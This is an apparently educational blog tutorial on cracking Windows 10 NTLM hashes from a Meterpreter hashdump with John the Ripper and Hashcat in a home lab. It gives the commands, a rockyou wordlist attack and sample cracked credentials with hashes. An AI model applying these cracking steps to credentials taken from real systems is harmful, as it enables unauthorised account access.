Kali Hashcat and John the Ripper Crack Windows Password hashdump

In our last tutorial we took a look at how to gain access to a windows machine, elevate the user privileges and then get a hashdump of the passwords for the user accounts. using Meterpreter.

Now we have a text file on our desktop of the passwords but they are in an unreadable format. This is where a tool on kali known as Hashcat and John the Ripper comes in handy. In this tutorial we will looking at how we can crack the windows 10 password we collected in the hashdump using this tool.

hashdump passwords saved to .txt file

We have saved this .txt file on our desktop as hash.txt.

Now open a new terminal window and enter john

┌──(kali㉿kali)-[~]
└─$ john 

You will get a lot of options! Here we are going to do something really simple so we can ignore many of those options. We will explore them in future posts. For now we are going to do something straight forward.

┌──(kali㉿kali)-[~]
└─$ john --show --format=NT Desktop/hash.txt

Run the command John –show –format=NT Desktop/hash.txt

This will tell John the Ripper to crack the hashed passwords contained in our hash.txt file and display the results. So go ahead and hit enter, let us see what we get.

┌──(kali㉿kali)-[~]
└─$ john --show --format=NT Desktop/hash.txt
Administrator:Passw0rd!:500:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
DefaultAccount::503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest::501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IEUser:Passw0rd!:1000:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::

4 password hashes cracked, 2 left
                                                                                                          

We were successful in cracking the password for the IEUser and the Administrator. Both of these are the same Passw0rd! which is the default password used on the virtual box Windows 10 machine. It is cracked very quickly just a few seconds.

Now we will change the password to something a little less obvious. I also added a password hint. Now I will re-run the steps for method 2 in the previous tutorial and we will get a new hashdump as well as the password hint

Crack using Hashcat

This time we will use Hashcat to crack the password, and we will use a dictionary type attack. In this case we have the rockyou.txt dictionary. A password dictionary is basically a text file with a list of words which can be used to try and crack the password. The bigger your dictionary the more chance there is of cracking the password. You can find many of these dictionaries online, sometimes they are comprised of stolen passwords from actual websites! As my chosen password was not in the standard rockyou.txt dictionary I have added it for the purposes of this tutorial.

So, we have the rockyou.txt dictionary on our desktop, and we have the new hashdump, which I edited so there is only two passwords to crack, the Administrator and the IEUser.

Now open up a terminal window and fire off the following

hashcat -m 1000 Desktop/hash.txt Desktop/rockyou.txt

┌──(kali㉿kali)-[~]
└─$ hashcat -m 1000 Desktop/hash.txt Desktop/rockyou.txt 

We are here telling hashcat to start decrypting the hashes contained in our hash.txt file and compare them to the dictionary rockyou.txt.

And we get a result! You can see below the password that matches highlighted.

hashcat crack password results

Every hash you crack is saved in a hashcat.pot file. This profile is a list of all hashes you already cracked, it saves you having to crack them again. In the above case, I already have previously cracked the administrator password using hashcat, so it’s in my profile. if I run the same command again I will get a message informing me all passwords are already saved.

hashcat potfile

So if we run the command with –show added

┌──(kali㉿kali)-[~]
└─$ hashcat -m 1000 --show Desktop/hash.txt Desktop/rockyou.txt

we will get the output of all the saved hashes that we have cracked already for this file.

hashcat potfile --show results

Crack using John The Ripper

Just for the sake of completeness, I’ll show you that I was also able to get this using the same dictionary with John The Ripper

┌──(kali㉿kali)-[~]
└─$ john --format=NT Desktop/hash.txt --wordlist=Desktop/rockyou.txt

This gave us the output

John The Ripper Cracked Hash

You can see it also picked up N@ck2302 from our dictionary. John The Ripper also stores a list of all previously cracked hashes so you won’t waste time cracking them again. You can run the following command

┌──(kali㉿kali)-[~]
└─$ john --show --format=NT Desktop/hash.txt

What I like about John The Ripper compared to Hashcat is it will also tell you the username that goes with the password, unlike Hashcat that seems to only keep the original hash and the password.

John The Ripper --show cracked passwords

And that’s all folks, a pretty simple introduction to cracking hashed passwords in windows 10 retrieved from a meterpreter hashdump

3 thoughts on “Kali Hashcat and John the Ripper Crack Windows Password hashdump

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: